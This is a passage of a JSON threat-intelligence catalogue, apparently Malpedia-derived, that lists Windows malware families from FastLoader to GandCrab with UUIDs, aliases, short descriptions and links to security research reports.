"https://malpedia.caad.fkie.fraunhofer.de/details/win.fastloader" ], "synonyms": [], "type": [] }, "uuid": "21b86dbb-d000-449c-bfe4-41faede4bd89", "value": "FastLoader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fast_pos", "https://blog.trendmicro.com/trendlabs-security-intelligence/fastpos-quick-and-easy-credit-card-theft/", "https://www.justice.gov/opa/pr/malware-author-pleads-guilty-role-transnational-cybercrime-organization-responsible-more-568", "https://blog.trendmicro.com/trendlabs-security-intelligence/fastpos-updates-in-time-for-retail-sale-season/", "http://documents.trendmicro.com/assets/fastPOS-quick-and-easy-credit-card-theft.pdf", "http://documents.trendmicro.com/assets/Appendix%20-%20FastPOS%20Updates%20in%20Time%20for%20the%20Retail%20Sale%20Season.pdf" ], "synonyms": [], "type": [] }, "uuid": "1bf03bbb-d3a2-4713-923b-218186c86914", "value": "FastPOS" }, { "description": "According to ESET Research, FatDuke is the current flagship backdoor of APT29 and is only deployed on the most interesting machines. It is generally dropped by the MiniDuke backdoor, but ESET also have seen the operators dropping FatDuke using lateral movement tools such as PsExec.The operators regularly repack this malware in order to evade detections. The most recent sample of FatDuke that ESET have seen was compiled on May 24, 2019. They have seen them trying to regain control of a machine multiple times in a few days, each time with a different sample. Their packer, described in a later section, adds a lot of code, leading to large binaries. While the effective code should not be larger than 1MB, ESET have seen one sample weighing in at 13MB, hence our name for this backdoor component: FatDuke.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fatduke", "https://www.secureworks.com/research/threat-profiles/iron-hemlock", "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf" ], "synonyms": [], "type": [] }, "uuid": "4325c84b-9a9b-4e7c-977f-20d7ae817b7e", "value": "FatDuke" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fct", "https://id-ransomware.blogspot.com/2020/02/fct-ransomware.html" ], "synonyms": [], "type": [] }, "uuid": "a4eb3f1f-2cc6-4a0f-9dd8-6ebc192ec0cd", "value": "FCT Ransomware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.felismus", "https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments" ], "synonyms": [], "type": [] }, "uuid": "07a41ea7-17b2-4852-bfd7-54211c477dc0", "value": "Felismus" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.felixroot", "https://medium.com/@Sebdraven/when-a-malware-is-more-complex-than-the-paper-5822fc7ff257", "https://www.welivesecurity.com/wp-content/uploads/2018/10/ESET_GreyEnergy.pdf", "https://www.fireeye.com/blog/threat-research/2018/07/microsoft-office-vulnerabilities-used-to-distribute-felixroot-backdoor.html" ], "synonyms": [], "type": [] }, "uuid": "e58755ac-3d0c-4ed3-afeb-e929816c8018", "value": "Felixroot" }, { "description": "Feodo (also known as Cridex or Bugat) is a Trojan used to commit e-banking fraud and to steal sensitive information from the victims computer, such as credit card details or credentials.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.feodo", "http://contagiodump.blogspot.com/2012/08/cridex-analysis-using-volatility-by.html", "https://feodotracker.abuse.ch/", "https://securelist.com/analysis/publications/78531/dridex-a-history-of-evolution/", "https://en.wikipedia.org/wiki/Maksim_Yakubets", "http://www.sempersecurus.org/2012/08/cridex-analysis-using-volatility.html" ], "synonyms": [ "Bugat", "Cridex" ], "type": [] }, "uuid": "66781866-f064-467d-925d-5e5f290352f0", "value": "Feodo" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fickerstealer", "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a", "https://twitter.com/3xp0rtblog/status/1321209656774135810" ], "synonyms": [], "type": [] }, "uuid": "6ad46852-24f3-4415-a4ab-57a52cd8a1cb", "value": "Ficker Stealer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fileice_ransom", "https://www.bleepingcomputer.com/news/security/in-dev-ransomware-forces-you-do-to-survey-before-unlocking-computer/" ], "synonyms": [], "type": [] }, "uuid": "ed0b8ac9-973b-4aaa-9904-8c7ed2e73933", "value": "FileIce" }, { "description": "Filerase is a .net API-based utility capable of propagating and recursively deleting files.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.filerase", "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems", "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/shamoon-destructive-threat-re-emerges-new-sting-its-tail" ], "synonyms": [], "type": [] }, "uuid": "e5fbb536-4994-4bd5-b151-6d5e41ed9f5b", "value": "Filerase" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.final1stspy", "https://www.intezer.com/apt37-final1stspy-reaping-the-freemilk/" ], "synonyms": [], "type": [] }, "uuid": "87467366-679d-425c-8bea-b9f77c543252", "value": "Final1stSpy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.findpos", "https://researchcenter.paloaltonetworks.com/2015/03/findpos-new-pos-malware-family-discovered/", "https://blogs.cisco.com/security/talos/poseidon" ], "synonyms": [ "Poseidon" ], "type": [] }, "uuid": "ae914b9a-67a2-425d-bef0-3a9624a207ba", "value": "FindPOS" }, { "description": "FinFisher is a commercial software used to steal information and spy on affected victims. It began with few functionalities which included password harvesting and information leakage, but now it is mostly known for its full Remote Access Trojan (RAT) capabilities. It is mostly known for being used in governmental targeted and lawful criminal investigations. It is well known for its anti-detection capabilities and use of VMProtect.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.finfisher", "https://www.welivesecurity.com/2017/09/21/new-finfisher-surveillance-campaigns/", "https://artemonsecurity.blogspot.de/2017/01/finfisher-rootkit-analysis.html", "https://cloudblogs.microsoft.com/microsoftsecure/2018/03/01/finfisher-exposed-a-researchers-tale-of-defeating-traps-tricks-and-complex-virtual-machines/", "https://netzpolitik.org/2020/our-criminal-complaint-german-state-malware-company-finfisher-raided/", "https://www.codeandsec.com/FinFisher-Malware-Analysis-Part-2", "https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/", "https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf", "http://www.msreverseengineering.com/blog/2018/1/23/a-walk-through-tutorial-with-code-on-statically-unpacking-the-finspy-vm-part-one-x86-deobfuscation", "https://securelist.com/apt-trends-report-q2-2019/91897/", "https://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/", "https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html", "https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" ], "synonyms": [ "FinSpy" ], "type": [] }, "uuid": "541b64bc-87ec-4cc2-aaee-329355987853", "value": "FinFisher RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fireball", "http://blog.checkpoint.com/2017/06/01/fireball-chinese-malware-250-million-infection/" ], "synonyms": [], "type": [] }, "uuid": "9ad28356-184c-4f02-89f5-1b70981598c3", "value": "Fireball" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.firebird_rat", "https://twitter.com/casual_malware/status/1237775601035096064" ], "synonyms": [], "type": [] }, "uuid": "0d63d92b-6d4d-470d-9f13-acce0c76911c", "value": "FireBird RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.firecrypt", "https://www.bleepingcomputer.com/news/security/firecrypt-ransomware-comes-with-a-ddos-component/" ], "synonyms": [], "type": [] }, "uuid": "c4346ed0-1d74-4476-a78c-299bce0409bd", "value": "FireCrypt" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.firemalv", "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf" ], "synonyms": [], "type": [] }, "uuid": "9715c6bc-4b1e-49a2-b1d8-db4f4c4f042c", "value": "FireMalv" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.first_ransom", "https://twitter.com/JaromirHorejsi/status/815949909648150528" ], "synonyms": [], "type": [] }, "uuid": "1ab17959-6254-49af-af26-d34e87073e49", "value": "FirstRansom" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.flame", "https://storage.googleapis.com/chronicle-research/Flame%202.0%20Risen%20from%20the%20Ashes.pdf", "https://securelist.com/the-flame-questions-and-answers-51/34344/", "https://www.crysys.hu/publications/files/skywiper.pdf", "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf", "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=ce2df4da-afe9-4a24-b28c-0fb3ba671d95&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments", "https://www.symantec.com/connect/blogs/flamer-recipe-bluetoothache" ], "synonyms": [ "sKyWIper" ], "type": [] }, "uuid": "c40dbede-490f-4df4-a242-a2461e3cfc4e", "value": "Flame" }, { "description": " FLASHFLOOD will scan inserted removable drives for targeted files, and copy those files from the\r\nremovable drive to the FLASHFLOOD-infected system. FLASHFLOOD may also log or copy additional data from the victim computer, such as system information\r\nor contacts.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.flashflood", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" ], "synonyms": [], "type": [] }, "uuid": "0ce7e94e-da65-43e4-86f0-9a0bb21d1118", "value": "FLASHFLOOD" }, { "description": "FlawedAmmyy is a well-known Remote Access Tool (RAT) attributed to criminal gang TA505 and used to get the control of target machines. The name reminds the strong link with the leaked source code of Ammyy Admin from which it took the main structure. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.flawedammyy", "https://www.youtube.com/watch?v=N4f2e8Mygag", "https://habr.com/ru/company/pt/blog/475328/", "https://threatrecon.nshc.net/2019/08/29/sectorj04-groups-increased-activity-in-2019/", "https://www.proofpoint.com/us/threat-insight/post/ta505-begins-summer-campaigns-new-pet-malware-downloader-andromut-uae-south", "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", "https://www.sans.org/reading-room/whitepapers/reverseengineeringmalware/unpacking-decrypting-flawedammyy-38930", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", "https://attack.mitre.org/software/S0381/", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", "https://www.secureworks.com/research/threat-profiles/gold-tahoe", "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505/", "https://secrary.com/ReversingMalware/AMMY_RAT_Downloader/", "https://web.archive.org/web/20161223002016/https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do", "https://blog.trendmicro.com/trendlabs-security-intelligence/ta505-at-it-again-variety-is-the-spice-of-servhelper-and-flawedammyy/", "https://www.proofpoint.com/us/threat-insight/post/ta505-abusing-settingcontent-ms-within-pdf-files-distribute-flawedammyy-rat", "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf", "https://www.proofpoint.com/us/threat-insight/post/leaked-source-code-ammyy-admin-turned-flawedammyy-rat" ], "synonyms": [], "type": [] }, "uuid": "18419355-fd28-41a6-bffe-2df68a7166c4", "value": "FlawedAmmyy" }, { "description": "According to ProofPoint, FlawedGrace is written in C++ and can be categorized as a Remote Access Trojan (RAT). It seems to have been developed in the second half of 2017 mainly.\r\n\r\nFlawedGrace uses a series of commands:\r\nFlawedGrace also uses a series of commands, provided below for reference:\r\n* desktop_stat\r\n* destroy_os\r\n* target_download\r\n* target_module_load\r\n* target_module_load_external\r\n* target_module_unload\r\n* target_passwords\r\n* target_rdp\r\n* target_reboot\r\n* target_remove\r\n* target_script\r\n* target_servers\r\n* target_update\r\n* target_upload\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.flawedgrace", "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", "https://twitter.com/MsftSecIntel/status/1273359829390655488", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", "https://www.msreverseengineering.com/blog/2021/3/2/an-exhaustively-analyzed-idb-for-flawedgrace", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", "https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505", "https://www.secureworks.com/research/threat-profiles/gold-tahoe", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672", "https://www.msreverseengineering.com/blog/2019/1/14/a-quick-solution-to-an-ugly-reverse-engineering-problem" ], "synonyms": [ "GraceWire" ], "type": [] }, "uuid": "ef591233-4246-414b-9fbd-46838f3e5da2", "value": "FlawedGrace" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.flexispy", "https://www.randhome.io/blog/2017/04/23/lets-talk-about-flexispy/" ], "synonyms": [], "type": [] }, "uuid": "2431a1e5-4e64-454a-94c8-8a95f88d2d4a", "value": "FlexiSpy (Windows)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.floki_bot", "https://www.arbornetworks.com/blog/asert/flokibot-flock-bots/", "https://www.flashpoint-intel.com/blog/cybercrime/floki-bot-emerges-new-malware-kit/", "https://blog.malwarebytes.com/threat-analysis/2016/11/floki-bot-and-the-stealthy-dropper/", "http://adelmas.com/blog/flokibot.php", "http://blog.talosintel.com/2016/12/flokibot-collab.html#more", "https://www.flashpoint-intel.com/flokibot-curious-case-brazilian-connector/", "https://www.cylance.com/en_us/blog/threat-spotlight-flokibot-pos-malware.html" ], "synonyms": [], "type": [] }, "uuid": "057ff707-a008-4ab8-8370-22b689ed3412", "value": "FlokiBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.flowcloud", "https://www.proofpoint.com/us/blog/threat-insight/flowcloud-version-413-malware-analysis", "https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new", "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape", "https://nao-sec.org/2021/01/royal-road-redive.html" ], "synonyms": [], "type": [] }, "uuid": "b018c5a7-ab70-4df0-b5aa-ceb1efd4b541", "value": "FlowCloud" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.flowershop", "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf", "https://storage.googleapis.com/chronicle-research/STUXSHOP%20Stuxnet%20Dials%20In%20.pdf" ], "synonyms": [], "type": [] }, "uuid": "0024c2d9-673f-4999-b240-4ae61a72c9b9", "value": "FlowerShop" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.floxif", "https://www.virusbulletin.com/virusbulletin/2012/12/compromised-library" ], "synonyms": [], "type": [] }, "uuid": "b1b2e501-b68f-4e2e-ab98-85e9bda0fbcd", "value": "Floxif" }, { "description": "Available since 2015, Flusihoc is a versatile C++ malware capable of a variety of DDoS attacks as directed by a Command and Control server. Flusihoc communicates with its C2 via HTTP in plain text.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.flusihoc", "https://www.arbornetworks.com/blog/asert/the-flusihoc-dynasty-a-long-standing-ddos-botnet/" ], "synonyms": [], "type": [] }, "uuid": "79e9df7d-abc8-45bd-abd3-be9b975f1a03", "value": "Flusihoc" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.flying_dutchman", "https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/" ], "synonyms": [], "type": [] }, "uuid": "a6f4d003-abe5-46ed-9e71-555b067f4d5a", "value": "FlyingDutchman" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.flystudio", "https://www.eset.com/int/about/newsroom/press-releases/announcements/press-threatsense-report-july-2009/" ], "synonyms": [], "type": [] }, "uuid": "19228908-ba8b-4718-86b3-209c7f1ae0bf", "value": "FlyStudio" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fobber", "https://blog.malwarebytes.com/threat-analysis/2015/06/elusive-hanjuan-ek-caught-in-new-malvertising-campaign/", "http://www.govcert.admin.ch/downloads/whitepapers/govcertch_fobber_analysis.pdf", "https://www.govcert.admin.ch/blog/12/analysing-a-new-ebanking-trojan-called-fobber", "http://blog.wizche.ch/fobber/malware/analysis/2015/08/10/fobber-encryption.html", "http://byte-atlas.blogspot.ch/2015/08/knowledge-fragment-unwrapping-fobber.html" ], "synonyms": [], "type": [] }, "uuid": "bb836040-c161-4932-8f89-bc2ca2e8c1c0", "value": "Fobber" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fonix", "https://labs.sentinelone.com/the-fonix-raas-new-low-key-threat-with-unnecessary-complexities/" ], "synonyms": [], "type": [] }, "uuid": "f8d501bc-cf5a-4e19-a7fa-fb0aac18cc63", "value": "FONIX" }, { "description": "FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called \"Babushka Crypter\" by Insidemalware.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook", "https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/", "https://www.botconf.eu/wp-content/uploads/2018/12/2018-R-Jullian-In-depth-Formbook-Malware-Analysis.pdf", "http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html", "https://link.medium.com/uaBiIXgUU8", "https://usualsuspect.re/article/formbook-hiding-in-plain-sight", "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors", "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", "https://www.cyberbit.com/blog/endpoint-security/formbook-research-hints-large-data-theft-attack-brewing/", "https://www.peerlyst.com/posts/how-to-analyse-formbook-a-new-malware-as-a-service-sudhendu?trk=explore_page_resources_recent", "https://tccontre.blogspot.com/2020/11/interesting-formbook-crypter.html", "https://isc.sans.edu/diary/26806", "https://drive.google.com/file/d/1oxINyIJfMtv_upJqRK9vLSchIBaU8wiU/view", "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", "https://www.hornetsecurity.com/en/threat-research/vba-purging-malspam-campaigns/", "https://www.fireeye.com/blog/threat-research/2017/10/formbook-malware-distribution-campaigns.html", "https://www.peerlyst.com/posts/how-to-understand-formbook-a-new-malware-as-a-service-sudhendu?", "https://blog.talosintelligence.com/2019/07/sweed-agent-tesla.html", "https://www.arbornetworks.com/blog/asert/formidable-formbook-form-grabber/", "https://thisissecurity.stormshield.com/2018/03/29/in-depth-formbook-malware-analysis-obfuscation-and-process-injection/", "https://news.sophos.com/en-us/2020/05/14/raticate/", "https://www.virusbulletin.com/virusbulletin/2019/01/vb2018-paper-inside-formbook-infostealer/", "http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/", "https://www.cyberbit.com/formbook-research-hints-large-data-theft-attack-brewing/", "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware", "http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html", "https://insights.oem.avira.com/a-new-technique-to-analyze-formbook-malware-infections/", "https://blog.talosintelligence.com/2018/06/my-little-formbook.html" ], "synonyms": [], "type": [] }, "uuid": "8378b417-605e-4196-b31f-a0c96d75aa50", "value": "Formbook" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.former_first_rat", "https://threatvector.cylance.com/en_us/home/breaking-down-ff-rat-malware.html", "https://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/" ], "synonyms": [ "ffrat" ], "type": [] }, "uuid": "9aacd2c7-bcd6-4a82-8250-cab2e4e2d402", "value": "FormerFirstRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fortunecrypt", "https://securelist.com/ransomware-two-pieces-of-good-news/93355/" ], "synonyms": [], "type": [] }, "uuid": "02caba7c-1820-40a3-94ae-dc89b5662b3e", "value": "FortuneCrypt" }, { "description": "A RAT employing Node.js, Sails, and Socket.IO to collect information on a target", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.frat", "https://github.com/jeFF0Falltrades/IoCs/blob/master/Broadbased/frat.md" ], "synonyms": [], "type": [] }, "uuid": "695f3381-302f-4fd0-b7a5-4e852291ce91", "value": "FRat" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.freenki", "https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/", "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", "https://www.trendmicro.com/en_us/research/20/l/who-is-the-threat-actor-behind-operation-earth-kitsune-.html" ], "synonyms": [], "type": [] }, "uuid": "f86b675a-b7b2-4a40-b4fd-f62fd96440f1", "value": "Freenki Loader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.friedex", "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/", "https://www.bleepingcomputer.com/news/security/doppelpaymer-ransomware-launches-site-to-post-victims-data/", "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", "https://sites.temple.edu/care/ci-rw-attacks/", "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", "https://www.youtube.com/watch?v=LUxOcpIRxmg", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://blog.trendmicro.com/trendlabs-security-intelligence/account-with-admin-privileges-abused-to-install-bitpaymer-ransomware-via-psexec", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/research/everis-bitpaymer-ransomware-attack-analysis-dridex/", "https://www.crowdstrike.com/blog/big-game-hunting-the-evolution-of-indrik-spider-from-dridex-wire-fraud-to-bitpaymer-targeted-ransomware/", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", "https://www.secureworks.com/research/threat-profiles/gold-drake", "https://www.crowdstrike.com/blog/doppelpaymer-ransomware-and-dridex-2/", "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/", "https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/" ], "synonyms": [ "BitPaymer", "DoppelPaymer", "IEncrypt" ], "type": [] }, "uuid": "58ae14a9-c4aa-490c-8404-0eb590f5650d", "value": "FriedEx" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.funnyswitch", "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/", "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/#id5-2" ], "synonyms": [], "type": [] }, "uuid": "58eb97d1-0c29-4596-bd4a-4590b28d988f", "value": "FunnySwitch" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.funny_dream", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", "https://nao-sec.org/2021/01/royal-road-redive.html", "https://www.bitdefender.com/files/News/CaseStudies/study/379/Bitdefender-Whitepaper-Chinese-APT.pdf", "https://insight-jp.nttsecurity.com/post/102glv5/pandas-new-arsenal-part-3-smanager" ], "synonyms": [], "type": [] }, "uuid": "46417b64-928a-43cd-91a6-ecee4c6cd4a7", "value": "FunnyDream" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.furtim", "https://sentinelone.com/blogs/sfg-furtims-parent/" ], "synonyms": [], "type": [] }, "uuid": "c9d78931-318c-4b34-af33-c90f6612a4f1", "value": "Furtim" }, { "description": "FuxSocy has some similarities to win.cerber but is tracked as its own family for now.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fuxsocy", "http://id-ransomware.blogspot.com/2019/10/fuxsocy-encryptor-ransomware.html", "https://www.bleepingcomputer.com/news/security/new-fuxsocy-ransomware-impersonates-the-notorious-cerber/" ], "synonyms": [], "type": [] }, "uuid": "289b4ffd-d406-44b1-99d4-3406dfd24adb", "value": "FuxSocy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gacrux", "https://krabsonsecurity.com/2020/10/24/gacrux-a-basic-c-malware-with-a-custom-pe-loader/" ], "synonyms": [], "type": [] }, "uuid": "551140ca-001b-49d8-aa06-82a5aebb02dd", "value": "Gacrux" }, { "description": "GalaxyLoader is a simple .NET loader. Its name stems from the .pdb and the function naming.\r\n\r\nIt seems to make use of iplogger.com for tracking.\r\nIt employed WMI to check the system for\r\n- IWbemServices::ExecQuery - SELECT * FROM Win32_Processor\r\n- IWbemServices::ExecQuery - select * from Win32_VideoController\r\n- IWbemServices::ExecQuery - SELECT * FROM AntivirusProduct\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.galaxyloader" ], "synonyms": [], "type": [] }, "uuid": "c12f1363-2bc8-4ffb-8f31-cbb5f85e0ffe", "value": "GalaxyLoader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gamapos", "http://documents.trendmicro.com/assets/GamaPOS_Technical_Brief.pdf" ], "synonyms": [ "pios" ], "type": [] }, "uuid": "8f785ee5-1663-4972-9a64-f02e7c46ba66", "value": "gamapos" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gameover_dga" ], "synonyms": [], "type": [] }, "uuid": "c4afb7c6-cfba-40d7-aa79-a2829828ed92", "value": "Gameover DGA" }, { "description": "Gameover ZeuS is a peer-to-peer botnet based on components from the earlier ZeuS trojan. According to a report by Symantec, Gameover Zeus has largely been used for banking fraud and distribution of the CryptoLocker ransomware. In early June 2014, the U.S. Department of Justice announced that an international inter-agency collaboration named Operation Tovar had succeeded in temporarily cutting communication between Gameover ZeuS and its command and control servers.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gameover_p2p", "http://www.syssec-project.eu/m/page-media/3/zeus_malware13.pdf", "https://www.blackhat.com/docs/us-15/materials/us-15-Peterson-GameOver-Zeus-Badguys-And-Backends.pdf", "https://www.cert.pl/wp-content/uploads/2015/12/2013-06-p2p-rap_en.pdf", "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", "https://krebsonsecurity.com/2019/12/inside-evil-corp-a-100m-cybercrime-menace/", "https://web.archive.org/web/20141016080249/http://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware", "https://www.justice.gov/opa/pr/us-leads-multi-national-action-against-gameover-zeus-botnet-and-cryptolocker-ransomware", "https://www.wired.com/?p=2171700", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", "https://www.lawfareblog.com/what-point-these-nation-state-indictments" ], "synonyms": [ "GOZ", "Mapp", "ZeuS P2P" ], "type": [] }, "uuid": "ffc8c386-e9d6-4889-afdf-ebf37621bc4f", "value": "Gameover P2P" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gamotrol" ], "synonyms": [], "type": [] }, "uuid": "9664712b-81f1-4c52-ad4d-a657a120fded", "value": "Gamotrol" }, { "description": "GandCrab was a Ransomware-as-a-Service (RaaS) emerged in January 28, 2018, managed by a criminal organization known to be confident and vocal, while running a rapidly evolving ransomware campaign. Through their aggressive, albeit unusual, marketing strategies and constant recruitment of affiliates, they were able to globally distribute a high volume of their malware.\r\n\r\nIn a surprising announcement on May 31, 2019, the GandCrab’s operators posted on a dark web forum, announced the end of a little more than a year of ransomware operations, citing staggering profit 